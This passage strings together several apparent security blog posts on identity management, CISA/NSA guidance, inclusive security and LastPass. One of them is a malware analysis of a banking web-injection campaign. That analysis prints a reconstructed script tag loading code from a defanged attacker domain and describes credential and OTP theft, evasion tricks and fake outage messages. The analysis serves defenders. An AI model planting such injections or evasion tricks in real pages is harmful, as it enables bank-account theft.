Identity and access have traditionally been a layer of abstraction within applications or operating systems; the identity fabric paradigm is about decoupling identity and access from applications, directories and operating systems. The aspiration is for identity to graduate to a layer that floats above systems rather than remain a layer embedded within them.

To leave aside tooling and technologies for the final word, implementing the available tooling that facilitates an identity fabric will not automatically make it a reality. Currently, a solution architect is almost as likely as not to believe each solution requires its own directory or access manager, much like most solutions must be underpinned by their own databases. In this context, is it any surprise that IAM processes are so siloed and fragmented?

Contact your in-country technical specialist to book a free identity fabric workshop and discuss how you can evolve your IAM environment into a cohesive security control plane.

Explore IBM IAM solutions

Web injections are back on the rise: 40+ banks affected by new malware campaign
https://securityintelligence.com/posts/web-injections-back-on-rise-banks-affected-danabot-malware/ (Tue, 19 Dec 2023)

Web injections, a favored technique employed by various banking trojans, have been a persistent threat in the realm of cyberattacks. These malicious injections enable cyber criminals to manipulate data exchanges between users and web browsers, potentially compromising sensitive information.

In March 2023, security researchers at IBM Security Trusteer uncovered a new malware campaign using JavaScript web injections. This new campaign is widespread and particularly evasive, with historical indicators of compromise (IOCs) suggesting a possible connection to DanaBot — although we cannot definitively confirm its identity.

Since the beginning of 2023, we have seen over 50,000 infected user sessions in which attackers used these injections, indicating the scale of threat activity. More than 40 banks across North America, South America, Europe and Japan were affected by this malware campaign.

In this blog post, we will delve into an analysis of the web injection utilized in the recent campaign, its evasive techniques, code flow, targets and the methods employed to achieve them.

A dangerous new campaign

Our analysis indicates that in this new campaign, the threat actors’ intention with the web injection module is to compromise popular banking applications and, once the malware is installed, intercept users’ credentials in order to access and likely monetize their banking information.

Our data shows that threat actors purchased malicious domains in December 2022 and began executing their campaigns shortly after. Since early 2023, we’ve seen multiple sessions communicating with those domains, which remain active as of this blog’s publication.

Upon examining the injection, we discovered that the JS script is targeting a specific page structure common across multiple banks. When the requested resource contains a certain keyword and a login button with a specific ID is present, new malicious content is injected.

Credential theft is executed by adding event listeners to this button, with an option to steal a one-time password (OTP) token with it.

This web injection doesn’t target banks with different login pages, but it does send data about the infected machine to the server and can easily be modified to target other banks.

Code delivery

In the past, we observed malware that directly injected the code into the compromised web page. However, in this campaign, the malicious script is an external resource hosted on the attacker’s server. It is retrieved by injecting a script tag into the head element of the page’s HTML document, with the src attribute set to the malicious domain.

HTML snippet:
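
The original snippet is not reproduced here; based on the description above, an illustrative reconstruction (the script path and parameters are placeholders) would look like:

    <head>
      <script src="https://jscdnpack[.]com/<script-path>?<bot-id-and-config-flags>"></script>
      ...
    </head>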

During our investigation, we observed that the malware initiates data exfiltration upon the initial retrieval of the script. It appends information, such as the bot ID and different configuration flags, as query parameters. The computer’s name is usually used as the bot ID, information that isn’t available through the browser. This indicates that the infection has already occurred at the operating system level, via other malware components, before content is injected into the browser session.

Figure 1: The initial obfuscated GET request fetching the script

Evasion techniques

The retrieved script is intentionally obfuscated and returned as a single line of code, which includes both the encoded script string and a small decoding script.

To conceal the malicious content, large strings are added at the beginning and end of the decoder code. The encoded string is then passed to a function builder within an anonymous function and promptly executed, which also initiates the execution of the malicious script.

Figure 2: Encoded string passed to de-obfuscation function, followed by removal of artifacts used for decoding the script. Two long strings were added to the beginning and end of the string to make it harder to find the code manually.

At first glance, the network traffic appears normal, and the domain resembles a legitimate content delivery network (CDN) for a JavaScript library. The malicious domains resemble two legitimate JavaScript CDNs:

  Malicious        | Legitimate
  jscdnpack[.]com  | cdnjs[.]com
  unpack[.]com     | unpkg[.]com

In addition, the injection looks for a popular security vendor’s JavaScript agent by searching for the keyword “adrum” in the current page URL. If the word exists, the injection doesn’t run.

Figure 3: Searching for a security product’s keyword and doing nothing if it’s found

The injection also performs function patching, changing built-in functions that are used to gather information about the current page document object model (DOM) and JavaScript environment. The patch removes any remnant evidence of the malware from the session.

All of these actions are performed to help conceal the presence of the malware.

Dynamic web injection

The script’s behavior is highly dynamic, continuously querying both the command and control (C2) server and the current page structure and adjusting its flow based on the information obtained.

The structure is similar to a client-server architecture, where the script maintains a continuous flow of updates to the server while requesting further instructions.

To keep a record of its actions, the script sends a request to the server, logging pertinent information, such as the originating function, success or failure status and updates on various flags indicating the current state.

Figure 4: Every a.V function call sends an update to the server about what function it was sent from and the current state of different flags

Figure 5: An example of multiple traffic logs, sent within a few seconds of the script running

The script relies on receiving a specific response from the server, which determines the type of injection it should execute, if any. This type of communication greatly enhances the resilience of the web injection.

For instance, it enables the injection to patiently wait for a particular element to load, provide the server with updates regarding the presence of the injected OTP field, retry specific steps (such as injecting an SMS submission overlay) or redirect to the login page before displaying an alert indicating that the bank is temporarily unavailable.

The server keeps identifying the device by the bot ID, so even if the client tries to refresh or load the page again, the injection can continue from its previously executed step.

If the server does not respond, the injection process will not proceed. Hence, for this injection to be effective, the server must remain online.

Script flow

The script is executed within an anonymous function, creating an object that encompasses various fields and helper functions for its usage. Within the object, the injection holds the initial configuration with fields such as bot ID, phone number and password. These fields are initially empty but are populated with relevant values as the run progresses.

Additionally, the object includes details such as the C2 server’s domain and requests path, default values for query parameters and default settings for various flags such as “send SMS” and “send token.” These default values can be modified later based on the server’s response, allowing for dynamic adjustments during runtime.

Following the initial configuration, the script sends a request to the server providing initial details, and assigns a callback to handle the response, allowing the execution to proceed.

Subsequently, the script proceeds to remove itself from the DOM tree, enhancing its ability to conceal its actions. From that stage onward, all subsequent script actions are asynchronous, saved inside event handlers and dependent on the responses received from the server.

The steps the script should perform are mostly based on an “mlink” flag received from the server on the initial request. The next step of the injection is to check for the specific login button of the targeted bank. The results of the element query are sent, and the “mlink” state changes accordingly.

Following that, a new function runs asynchronously on an interval, looking for the login button and assigning a malicious event listener if found. The listener waits for a click event, collects the login credentials and handles it based on the current configuration.

For example, if the “collect token” flag is on, but the script can’t find the two-factor authentication (2FA) token input field, it just stops the current run and does nothing. If the token is found or wasn’t looked for in the first place, the script sends all the gathered information to the server.

After that, it can inject a “loading” bar to the page (opengif function), cancel the original login action or allow the client to continue with the actions by removing the handler and “clicking” it again on behalf of the user (by dispatching another “click” event).

Figure 6: The event listener prevents the default action of the login button or deletes itself and dispatches another click event based on the outcome of function G

Figure 7: This section of function G reads credentials and tries to read the injected token field value, depending on the current state of the page and flags

Potential operational states

Returning to the “synchronous” part of the callback, let’s examine some potential operational states and the corresponding actions taken.

When the “mlink” value is 2, the script injects a div that prompts the user to choose a phone number for 2FA. Once the user selects a phone number, a login attempt can be executed using the stolen credentials, and a valid token is sent to the victim from the bank.

Figure 8: Prompting a phone number for two-factor authentication

The following state is when “mlink” is equal to three, where the input field for the OTP token is injected. In this manner, the malware deceives the victim into providing the token, effectively bypassing the 2FA protection mechanism.

Figure 9: Prompting for the received token

When the “mlink” value is four, the script introduces an error message on the login page, indicating that online banking services will be unavailable for a duration of 12 hours. This tactic aims to discourage the victim from attempting to access their account, providing the threat actor with an opportunity to perform uninterrupted actions.

Figure 10: An error message that banking services are unavailable for 12 hours, giving the threat actor ample time to work

When the “mlink” value is 5, the script injects a page loading overlay that mimics the appearance of the original website’s loading animation. A timeout is set before transitioning to a different state, effectively “completing” the page load process.

Figure 11: An injected loading screen, an exact duplicate of the original loading screen

When the value of “mlink” is six, a “clean up” flow is initiated, removing any injected content from the page. This value serves as the default assignment for the flag in case no specific instruction is received from the server.

  Mlink value | Operation
  2           | 2FA choose phone number prompt
  3           | 2FA insert token prompt
  4           | Online banking unavailable error
  5           | Page loading overlay
  6           | Cleanup

In total, there are nine distinct potential values for the “mlink” variable, each corresponding to different states and behaviors. Additionally, multiple flags activate various actions and result in different data being sent back to the server. Combining these “mlink” values and flags allows for a diverse range of actions and data exchanges between the script and the server.

Urging vigilance

IBM has observed widespread activity from this malware campaign affecting banking applications of numerous financial institutions across North America, South America, Europe and Japan. This sophisticated threat showcases advanced capabilities, particularly in executing man-in-the-browser attacks with its dynamic communication, web injection methods and the ability to adapt based on server instructions and current page state. The malware represents a significant danger to the security of financial institutions and their customers.

Users should practice vigilance when using banking apps. This includes contacting their bank to report potentially suspicious activity on their accounts, not downloading software from unknown sources and following best practices for password hygiene and email security hygiene.

Individuals and organizations must also remain vigilant, implement robust security measures and stay informed about emerging malware to effectively counteract these threats.

IBM Security Trusteer helps you to detect fraud, authenticate users and establish identity trust across the omnichannel customer journey. More than 500 leading organizations rely on Trusteer to help secure their customers’ digital journeys and support business growth.

Taking the complexity out of identity solutions for hybrid environments

For the past two decades, businesses have been making significant investments to consolidate their identity and access management (IAM) platforms and directories to manage user identities in one place. However, the hybrid nature of the cloud has led many to realize that this ultimate goal is a fantasy. Instead, businesses must learn how to consistently and effectively manage user identities across multiple IAM platforms and directories.

As cloud migration and digital transformation accelerate at a dizzying pace, enterprises are left with a host of new identity challenges that many aren’t prepared to deal with. The proliferation of diverse cloud environments, each with its own identity solutions, coupled with the complexities of legacy systems, has resulted in fragmented and siloed identity services. That is where the identity fabric comes in.

The challenge of hybrid identity

Most environments comprise a mixture of multiple cloud and on-premises (on-prem) applications and systems. Though many organizations are moving to modern Software-as-a-Service (SaaS) solutions, on-prem IAM products are often deeply embedded in mission-critical systems. They can't simply be unplugged and replaced with modernized IAM solutions without risking significant business disruption, loss of data continuity, potential security risks and single points of failure.

Additionally, many modern IAM solutions struggle to meet the complex requirements of large, multi-layered organizations, including user role management, compliance with industry-specific regulations and integration with existing IT infrastructure. It has become painfully evident that a one-size-fits-all IAM system doesn’t exist, forcing organizations to use a combination of IAM systems across hybrid clouds and on-prem. A recent Osterman Research Report found that 52% of organizations stated that addressing identity access challenges in hybrid and multi-cloud environments was a critical initiative for them over the next year.

Managing identity fragmentation

As identity services multiply across hybrid cloud environments, organizations struggle to manage and enforce consistent user policies, comply with changing regulations, gain holistic visibility and mitigate user-related risks. Legacy applications remain tethered to legacy identity solutions, creating an inconsistent user experience without a single authoritative source for a user's identity. Osterman research showed that for 64% of responding organizations, the top identity initiative for the next twelve months was extending cloud identity capabilities to on-prem applications.

What is an identity fabric?

Businesses need a versatile solution that complements existing identity solutions while effectively integrating the various IAM silos that organizations have today into a cohesive whole. To provide consistent security policies and a better user experience, businesses require the ability to quickly audit all authentication workflows, layer intelligence to automate data-driven decisions and empower artificial intelligence (AI) and machine learning (ML) across legacy and on-prem applications in hybrid cloud deployments.

This is where an identity fabric comes into play: to bridge the gap between legacy identity infrastructure and modern cloud-based IAM systems. An identity fabric aims to integrate and enhance existing solutions rather than replace them. The goal is to create a less complex environment where consistent security authentication flows and visibility can be enforced. This approach aligns with our strategy of “taking the complexity out of identity solutions for hybrid environments.”

Providing the foundation for an identity fabric

We have found that there are some fundamental building blocks to delivering an effective identity fabric:

  • The first step is to eliminate the identity silos by creating a single, authoritative directory. It’s critical that this directory be vendor-agnostic so it can stitch together all of your directories to create a single source of truth, management and enforcement. IBM Security Verify Directory offers flexibility, efficiency and scalability across on-prem, cloud and hybrid environments, providing smooth and secure access control.
  • The next step is to extend modern authentication mechanisms to your legacy applications, which are often left behind because modifying their authentication flows demands funding, time and/or skills that are in short supply. IBM's Application Gateway is a product-agnostic gateway designed to bridge the gap between legacy and modern apps and systems, with no-code integrations that let legacy applications take advantage of modern and advanced authentication capabilities, helping to reduce risk and improve regulatory compliance.
  • The third step incorporates behavioral risk-based authentication for modern and legacy applications. Regardless of the IAM solutions in use, risk-based authentication solutions enable a continuous assessment of risk levels at the time of access. Verify Trust introduces dynamic risk-based authentication, enhancing security without requiring a complete system overhaul. Powered by AI, Verify Trust delivers accurate and continuous risk-based access protection against the latest account takeover techniques by combining global intelligence, user behavioral biometrics, authentication results, network data, account history and a range of device risk detection capabilities.

Orchestration holds your identity fabric together

Orchestration is the integration glue to an identity fabric. Without it, building an identity fabric would be resource-intensive. Orchestration allows more intelligent decision-making and simplifies onboarding and offboarding. It enables you to build consistent security policies while taking the burden off your administrators as you quickly and easily automate processes at scale.

For example, suppose you have a legacy application with a homegrown identity system, and the people who wrote it have long since left. Orchestration enables you to create a workflow so that when a user logs in to that system, a user account is automatically created in the preferred modern identity solution through low-code or no-code identity orchestration. When users return to the homegrown application, they will automatically access it with a modern authentication mechanism.
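
The sketch below illustrates that just-in-time flow in Python, assuming hypothetical LegacyStore and ModernIdP interfaces; a real deployment would use the orchestration engine's connectors rather than hand-written classes.

```python
class LegacyStore:
    """Stand-in for a homegrown identity system (hypothetical)."""
    def __init__(self, users: dict):
        self.users = users

    def verify(self, username: str, password: str) -> bool:
        return self.users.get(username, {}).get("password") == password

    def get_profile(self, username: str) -> dict:
        return {k: v for k, v in self.users[username].items() if k != "password"}

class ModernIdP:
    """Stand-in for the preferred modern identity provider (hypothetical)."""
    def __init__(self):
        self.users: dict = {}

    def user_exists(self, username: str) -> bool:
        return username in self.users

    def create_user(self, username: str, profile: dict) -> None:
        self.users[username] = profile

def orchestrated_login(username: str, password: str,
                       legacy: LegacyStore, idp: ModernIdP) -> bool:
    """Verify against the legacy store, then migrate the identity on first use."""
    if not legacy.verify(username, password):
        return False
    if not idp.user_exists(username):
        # Just-in-time migration: subsequent logins can use the modern IdP's
        # authentication mechanisms (MFA, passkeys) instead of the legacy flow.
        idp.create_user(username, legacy.get_profile(username))
    return True

legacy = LegacyStore({"ada": {"password": "s3cret", "email": "ada@example.com"}})
idp = ModernIdP()
assert orchestrated_login("ada", "s3cret", legacy, idp)
assert idp.user_exists("ada")
```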

Effective identity orchestration brings simplicity to the coexistence of legacy and modern applications. It removes the burden of identity solution proliferation, consolidates identity silos, reduces vendor lock-in and simplifies migrations by allowing highly customizable, little-to-no-code flows across identity solutions.

Take the next step in identity solutions

Whether you are an organization looking for workforce access, customer IAM, privileged access or governance identity solutions, or looking to build an identity fabric with your existing identity solutions, IBM Security Verify takes the complexity out of identity solutions for hybrid environments, emphasizing innovation and customer-centricity. We invite all stakeholders to join us on this transformative journey as we shape the future of IAM. Together, we will simplify identity solutions for the ever-evolving world of hybrid environments.

Artificial intelligence threats in identity management

The 2023 Identity Security Threat Landscape Report from CyberArk identified some valuable insights. The 2,300 security professionals surveyed responded with some sobering figures:

  • 68% are concerned about insider threats from employee layoffs and churn
  • 99% expect some type of identity compromise driven by financial cutbacks, geopolitical factors, cloud applications and hybrid work environments

Additionally, many feel digital identity proliferation is on the rise and the attack surface is at risk from artificial intelligence (AI) attacks, credential attacks and double extortion. For now, let's focus on digital identity proliferation and AI-powered attacks.

Digital identities: The solution or the ultimate Trojan horse?

For some time now, digital identities have been considered a potential solution to improve cybersecurity and reduce data loss. The general thinking goes like this: Every individual has unique markers, ranging from biometric signatures to behavioral actions. This means digitizing and associating these markers to an individual should minimize authorization and authentication risks.

Loosely, it is a “trust and verify” model.

But what if the “trust” is no longer reliable? What if, instead, something fake is verified — something that should never be trusted in the first place? Where is the risk analysis happening to remedy this situation?

The hard sell on digital identities has, in part, come from a potentially skewed view of the technology world: namely, the assumption that information security technology and malicious actor tactics, techniques and procedures (TTPs) change at a similar rate. Reality tells us otherwise: TTPs, especially with the assistance of AI, are blasting right past security controls.

You see, a hallmark of AI-enabled attacks is that the AI can learn about the IT estate faster than humans can. As a result, both technical and social engineering attacks can be tailored to an environment and individual. Imagine, for example, spearphishing campaigns based on large data sets (e.g., your social media posts, data that has been scraped off the internet about you, public surveillance systems, etc.). This is the road we are on.

Digital identities may have had a chance to successfully operate in a non-AI world, where they could be inherently trusted. But in the AI-driven world, digital identities are having their trust effectively wiped away, turning them into something that should be inherently untrustworthy.

Trust needs to be rebuilt, as a road where nothing is trusted only logically leads to one place: total surveillance.

Artificial intelligence as an identity

Identity verification solutions have become quite powerful. They improve access request time, manage billions of login attempts and, of course, use AI. But in principle, verification solutions rely on a constant: trusting the identity to be real.

The AI world changes that by turning “identity trust” into a variable.

Assume the following to be true: We are relatively early into the AI journey but moving fast. Large language models can replace human interactions and conduct malware analysis to write new malicious code. Artistry can be performed at scale, and filters can make a screeching voice sound like a professional singer. Deep fakes, in both voice and visual representations, have moved away from “blatantly fake” territory to “wait a minute, is this real?” territory. Thankfully, careful analysis still permits us the ability to distinguish the two.

There is another hallmark of AI-enabled attacks: machine learning capabilities. They will get faster and better, and they remain prone to manipulation. Remember, it is not the algorithm that has a bias, but the programmer inputting their inherent bias into the algorithm. Therefore, with open source and commercial AI technology availability on the rise, how long can we maintain the ability to distinguish between real and fake?

Overlay technologies to make the perfect avatar

Think of the powerful monitoring technologies available today. Biometrics, personal nuances (walking patterns, facial expression, voice inflections, etc.), body temperatures, social habits, communication trends and everything else that makes you unique can be captured, much of it by stealth. Now, overlay increasing computational power, data transfer speeds and memory capacity.

Finally, add in an AI-driven world, one where malicious actors can access large databases and perform sophisticated data mining. The delta to create a convincing digital replica shrinks. Paradoxically, as we create more data about ourselves for security measures, we grow our digital risk profile.

Reduce the attack surface by limiting the amount of data

Imagine our security as a dam and data as water. To date, we have leveraged data for mostly good means (e.g., water harnessed for hydroelectricity). There are some upkeep issues (e.g., attackers, data leaks, poor maintenance) that have been mostly manageable thus far, if exhausting.

But what if the dam fills faster than the infrastructure was designed to manage and hold? The dam fails. Using this analogy, the play is then to either divert excess water and reinforce the dam, or limit the data and rebuild trust.

What are some methods to achieve this?

  1. The top-down approach creates guardrails (strategy). Generate and hold only the data you need, and even go as far as disincentivizing excess data holds, especially data tied to individuals. Fight the temptation to scrape and data mine absolutely everything for the sake of micro-targeting. Every extra data hold is more water into the reservoir unless there are more secure reservoirs (hint: segmentation).
  2. The bottom-up approach limits access (operations). Whitelisting is your friend. Limit permissions and start to rebuild identity trust. No more “opt-in” by default; move to “opt-out” by default. This allows you to manage water flow through the dam better (e.g., reduced attack surface and data exposure).
  3. Focus on what matters (tactics). We have demonstrated we cannot secure everything. This is not a criticism; it is reality. Focus on risk, especially for identity and access management. Coupled with limited access, the risk-based approach prioritizes the cracks in the dam for remediation.

In closing, risk must be taken to realize future rewards. “Risk-free” is for fantasy books. Therefore, in the age of a glut of data, the biggest “risk” may be to generate and hold less data. The reward? Minimized impact from data loss, allowing you to bend while others break.

CISA, NSA issue new IAM best practice guidelines

The Cybersecurity and Infrastructure Security Agency (CISA) and the National Security Agency (NSA) recently released a new 31-page document outlining best practices for identity and access management (IAM) administrators.

As the industry increasingly moves towards cloud and hybrid computing environments, managing the complexities of digital identities can be challenging. Nonetheless, the importance of IAM cannot be overstated in today’s world, where data security is more critical than ever. Meanwhile, IAM itself can be a source of vulnerability if not implemented and managed effectively.

Identity-related tactics used by threat actors

The CISA and NSA report highlighted real-world examples to illustrate the type and severity of threats targeting IAM. For example, CISA Alert (AA21-321A) revealed that advanced persistent threat (APT) actors sponsored by the Iranian government are actively exploiting IAM vulnerabilities. The alert showed how attackers can compromise credentials, escalate privileges and create new user accounts on critical infrastructure components across various sectors in the United States.

These vulnerabilities allowed actors to gain access to domain controllers, servers, workstations and directories responsible for authenticating and authorizing users and devices. With this level of access, APT actors could conduct follow-on operations like data exfiltration, encryption, ransomware and extortion.

Moreover, cyber groups are increasingly targeting Single Sign-On (SSO) technology, a critical component of IAM. By exploiting SSO functions, actors can potentially bypass traditional access controls and gain access to a broad range of resources across the organization.

IAM threat mitigation techniques

The best practices discussed in the CISA-NSA report revolved around tactics that counter threats to IAM through deterrence, prevention, detection, damage limitation and response. These techniques include:

  • Identity Governance
  • Environmental Hardening
  • Identity Federation and Single Sign-On
  • Multi-Factor Authentication
  • IAM Monitoring and Auditing.

Let’s look at each of these in more detail.

Identity governance

Identity governance is a process that centralizes user and service accounts management based on organizational policies. This provides enhanced visibility and controls to prevent unauthorized access. Identity governance includes segregation of duties, role management, logging, access review, analytics and reporting.

As per CISA / NSA, identity governance focuses on three key user lifecycle moments within an organization (a simplified automation sketch follows the list):

  • When a user joins: Identity governance collects biographical, position-related and credential data (certifications or clearances) from recruiting, human capital management and personnel security systems to build an identity record for the individual.
  • When a user moves within the organization: If an individual's role changes, entitlements for the new role are automatically granted, and entitlements that are no longer needed are removed.
  • When a user leaves: When users leave an organization for any reason, their accounts and privileges must be promptly terminated. Identity governance can automate the disablement and removal of accounts in response to separation actions in human capital management systems or other personnel systems.
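
Here is a simplified Python model of those three moments. The role-to-entitlement mapping and in-memory account store are invented for illustration; real identity governance products drive these actions from HR-system events.

```python
# Role-to-entitlement mapping and account store are invented for illustration.
ROLE_ENTITLEMENTS = {
    "analyst": {"siem-read", "ticketing"},
    "engineer": {"siem-read", "ticketing", "code-repo", "build-system"},
}

accounts = {}  # username -> set of entitlements

def joiner(user: str, role: str) -> None:
    """Provision a new hire with exactly the entitlements their role needs."""
    accounts[user] = set(ROLE_ENTITLEMENTS[role])

def mover(user: str, new_role: str) -> None:
    """Grant entitlements for the new role and revoke ones no longer needed."""
    wanted = ROLE_ENTITLEMENTS[new_role]
    accounts[user] |= wanted - accounts[user]   # grant missing entitlements
    accounts[user] -= accounts[user] - wanted   # remove stale entitlements

def leaver(user: str) -> None:
    """Promptly disable and remove the account on separation."""
    accounts.pop(user, None)

joiner("ada", "analyst")
mover("ada", "engineer")
leaver("ada")
assert "ada" not in accounts
```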

Environmental hardening

The CISA-NSA report points out that hardening the enterprise environment involves ensuring that IAM foundations and implementations are trustworthy and secure. The level of hardening required varies depending on the assets being protected. For instance, credential-issuing systems for cryptographic digital certificates or password stores are more critical since they secure authentication for entire organizations.

Environmental hardening is crucial in securing the hardware and software components surrounding an IAM solution. Some environmental hardening best practices include patching, asset management and network segmentation. Combining these with strong IAM foundations and implementations reduces the chance of a security breach and minimizes damage in the event of a breach.

CISA / NSA recommend the following immediate actions to improve environmental hardening:

  • Take an inventory of all assets within the organization. Determine the cause of missing or additional unrecognized assets.
  • Identify all the local identities on the assets to know who has access to which assets.
  • Understand what security controls are in the enterprise environment now and what security gaps persist.
  • Develop a network traffic baseline to detect network security anomalies.

Identity federation and SSO

Identity federation, which involves SSO within or between organizations, can effectively manage differences in policies and risk levels. A centralized approach to managing identities ensures compliance with organizational policies and reduces the risk of security breaches.

Identity Federation and SSO eliminate the need for users to maintain multiple identities in both internal and external directories, applications and other platforms. It removes the requirement for local identities at every asset, ensuring seamless integration with other security controls such as privileged access management for step-up authentication. This increases the confidence that only active users are allowed access, thereby enhancing security.

SSO makes life easier for users as they only need to remember one complex and hard-to-guess passphrase. It also facilitates the move to strong MFA which can potentially eliminate passwords altogether.

Multi-factor authentication

Authentication systems are a primary target for attackers, who seek out and exploit their vulnerabilities. They are also high-volume user interfaces and are often seen as obstacles to user productivity. As a result, the challenge for engineers is to create seamless and user-friendly authentication systems that are also highly secure against attacks.

MFA strengthens password-based authentication by requiring an additional factor, which mitigates common attacks and misuse practices. Meanwhile, passwordless authentication eliminates passwords as an attack vector.

MFA can be based on:

  • Something you have (smartphone, key fob)
  • Something you know (password, mother’s maiden name, etc.)
  • Something you are (fingerprint or biometric facial scan).

The most secure types of MFA include fast identity online (FIDO) and public key infrastructure (PKI). FIDO stores personally identifiable information, such as biometric authentication data, locally on the user’s device. PKI uses digital certificates to verify the user’s identity and permissions.

App-based MFA solutions are of intermediate strength. App-based solutions include mobile push notifications, one-time passwords (OTPs) or token-based OTP. Meanwhile, SMS and voice messages are the least secure type of MFA.
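
To illustrate how the app-based OTP category generally works, here is a minimal time-based OTP generator in the style of RFC 6238, using only Python's standard library. The base32 secret is a made-up example; real authenticator apps use secrets provisioned during enrollment, and production systems should rely on vetted libraries.

```python
import base64
import hashlib
import hmac
import struct
import time

def totp(secret_b32: str, interval: int = 30, digits: int = 6) -> str:
    """Generate a time-based OTP (RFC 6238 style, HMAC-SHA1)."""
    key = base64.b32decode(secret_b32)
    counter = int(time.time()) // interval            # moving factor: current time step
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                        # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# Example with a made-up base32 secret; a real secret is provisioned at enrollment.
print(totp("JBSWY3DPEHPK3PXP"))
```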

IAM monitoring and auditing

As per the CISA / NSA report, IAM auditing and monitoring should focus on compliance checks as well as identifying threat indicators and detecting anomalous activities. This involves generating, collecting and analyzing logs, events and other data to provide effective means of identifying compliance breaches and suspicious actions.

Integrating automated tools with auditing and monitoring capabilities can help orchestrate response actions against IAM attacks. Additionally, effective reporting from these processes can provide situational awareness of an organization’s security posture regarding IAM.

Identity matters now more than ever

The new CISA / NSA guidelines build upon the experience and observation of years of IAM implementations. For any enterprise, a well-developed IAM strategy is essential for effective security.

You can read the entire CISA / NSA Best Practices report here.

The importance of accessible and inclusive cybersecurity

As the digital world continues to dominate our personal and work lives, it’s no surprise that cybersecurity has become critical for individuals and organizations.

But society is racing toward "digital by default", which can be a hardship for individuals unable to access digital services. People depend on these channels for essentials, including financial, housing, welfare, healthcare and educational services. Inclusive security ensures that such services are as widely accessible as possible and provides digital protections to users regardless of the individual's capabilities, abilities and resources.

Therefore, to adequately address cybersecurity risks, we must also consider accessibility and inclusivity. Not everyone has equal access to digital devices or skill sets, and those without are more vulnerable to cyberattacks. The COVID-19 pandemic also underscored the significant role digital access plays in society.

Let’s examine the significance of accessible and inclusive cybersecurity and the steps we can take to enhance security for all.

What is accessible and inclusive cybersecurity?

Accessible and inclusive cybersecurity refers to designing and implementing cybersecurity measures to fit the needs of all individuals. This implies designing policies, procedures and technologies with people with disabilities and other marginalized groups in mind.

The goal of accessible and inclusive cybersecurity is to guarantee that everyone has equal access to the tools and resources necessary for protection from cyber threats — including anyone with limited physical access to digital devices, limited technical skill sets or other barriers.

By making cybersecurity more accessible and inclusive, we can create a more equitable and secure digital environment for everyone.

Unfortunately, the statistics are not in our favor. Accessibility issues remain a major challenge for those who are digitally excluded. According to 2022 data from the World Bank, approximately 3 billion people worldwide remain offline due to factors like income, geography, education and disability.

Individuals left out of the digital world often lack access to the tools and resources needed to protect themselves against cyberattacks.

Why accessibility issues are so critical

Accessibility issues pose a significant hurdle for those who are digitally excluded.

But what is digital exclusion? It refers to the absence of physical access to digital devices, the inability to develop skills needed in the digital world and access disparities based on factors like income or location.

Physical access to digital devices can be a significant barrier for anyone living with disabilities or in remote areas. Individuals with visual impairments may find it difficult to use devices that do not have accessible features, such as screen readers or magnification tools. Additionally, those living in these remote places may lack high-speed internet or reliable electricity, thus restricting their capacity to utilize modern technology.

A lack of skills to navigate the digital world presents a significant obstacle for digitally excluded people. A 2021 report from Pew Research Center revealed that 14% of adults with a high school education or less do not use the internet, with many citing a lack of digital skills as their primary barrier. Without the knowledge and ability to protect themselves online from threats such as viruses and phishing attempts, individuals become more susceptible to cyber crime, unable to recognize and mitigate potential dangers.

Finally, factors like income and geography can severely limit access to digital technology and resources. In many places around the world, individuals living in low-income areas may not have access to high-speed internet or may lack the financial means to purchase digital devices. This presents a major obstacle for those trying to make ends meet.

When it comes to cyber threats, accessibility issues are a significant concern for those who are digitally excluded and can immensely impact an individual’s capacity to protect themselves.

COVID-19 and the importance of digital access and cybersecurity

The COVID-19 pandemic has brought about profound changes to our daily lives, such as how we access essential services and work. With social distancing measures in place, many have turned to digital technology for healthcare, education and other essential needs. Furthermore, many companies have moved towards remote work models, further underscoring the significance of secure digital access and cybersecurity measures.

However, the transition to digital technology has also highlighted the digital divide and the challenges faced by those it excludes. People may struggle to access healthcare services or work remotely without reliable internet or devices. Similarly, those without strong digital skills could be more vulnerable to cyber threats when navigating unfamiliar digital environments.

The COVID-19 pandemic has also presented new cybersecurity risks. As more people rely on the internet to work and access essential services, cyber criminals are launching more advanced attacks. According to a report from the FBI, reported cyber crimes increased dramatically after the pandemic began. These incidents can have devastating results, such as financial loss, identity theft and damage to personal and professional reputations.

COVID-19 has brought to light the essential role digital access and cybersecurity play in our society. Moving forward, it is essential to address the digital divide and design cybersecurity measures with accessibility and inclusivity in mind.

Steps to promote accessible and inclusive cybersecurity

Improving accessible and inclusive cybersecurity is a complex challenge. Moving forward requires the collaboration of stakeholders such as governments, technology companies and civil society organizations.

Still, there are steps that can be taken to promote accessibility and inclusivity in cybersecurity:

Create accessible cybersecurity policies and standards. Governments and technology companies should collaborate to develop policies and standards that guarantee cybersecurity measures are accessible and inclusive, taking into account the needs of people with disabilities and other marginalized groups. These rules and standards should be tailored specifically for this purpose.

Provide digital skills training. Offering digital skills training can give digitally excluded individuals the confidence to go digital and protect themselves from cyber threats. Governments, technology companies and civil society organizations all have a role to play in providing this type of instruction.

Ensure digital devices and software are accessible. Digital devices and software should be designed with accessibility features like screen readers or magnification tools in mind — enabling individuals with disabilities to utilize modern technology and protect themselves from cyber threats.

Address inequalities of access. Governments and technology companies should collaborate to address disparities in access to digital technology and resources. This could include initiatives that increase access to high-speed internet and digital devices.

Involve individuals with disabilities and other marginalized groups in cybersecurity decision-making. It is essential to include individuals with disabilities and other marginalized groups in cybersecurity decision-making, so their needs and perspectives can guide the process.

Equitable cybersecurity is the future

Improving accessible and inclusive cybersecurity is a daunting challenge. However, it’s also a critical step toward creating a more equitable and secure digital space for everyone. By working together, we can design cybersecurity measures with inclusivity in mind so that everyone has equal access to the tools and resources needed to protect themselves against cyber threats.

What's going on with LastPass, and is it safe to use?

When it comes to password managers, LastPass has been one of the most prominent players in the market. Since 2008, the company has focused on providing secure and convenient solutions to consumers and businesses. Or so it seemed.

LastPass has been in the news recently for all the wrong reasons, with multiple reports of data breaches resulting from failed security measures. To make matters worse, many have viewed LastPass’s response to these incidents as less than adequate. The company seemed to downplay the severity of the incidents and failed to provide adequate transparency of the issues within a reasonable amount of time.

The recent events have led many to wonder if these are the last days for LastPass. Or is this simply a roadblock in the company’s long history of reliable security? You be the judge.

LastPass’s recent history of security failures

